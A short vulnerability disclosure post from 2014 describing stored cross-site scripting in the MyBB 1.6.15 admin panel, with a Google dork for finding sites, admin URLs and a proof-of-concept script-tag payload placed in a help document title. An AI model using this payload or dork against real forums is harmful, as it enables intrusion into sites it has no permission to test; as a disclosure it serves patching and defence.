facebook facebook twitter rss

MyBB 1.6.15 - Admin Panel Multiple XSS

Author: DemoLisH , Published: 14-08-2014
# Title: MyBB 1.6.15 - Admin Panel Multiple XSS
# Google Dork: intext:"Powered By MyBB"
# Date: 14.08.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.6.15 - Latest Version
# Contact: onur@b3yaz.org

***************************************************

a) Help Documents

Go to -> Add New Document, for example:
localhost/admin/index.php?module=config-help_documents&action=add&type=document

Now, add a title:
"><script>alert('DemoLisH')</script>

Alert will appear whenever someone enter help documents configuration:
localhost/admin/index.php?module=config-help_documents


b) Administrator Logs

Go to -> Administrator Logs, for example:
http://localhost/admin/index.php?module=tools-adminlog

Now, we use the code on other pages will work here.

***************************************************

[~#~] Thanks To:
Mugair, X-X-X, PoseidonKairos, DexmoD, Micky, BIGERAN and all TurkeySecurity & Elit-Hack.Org Members.

Like us on Facebook :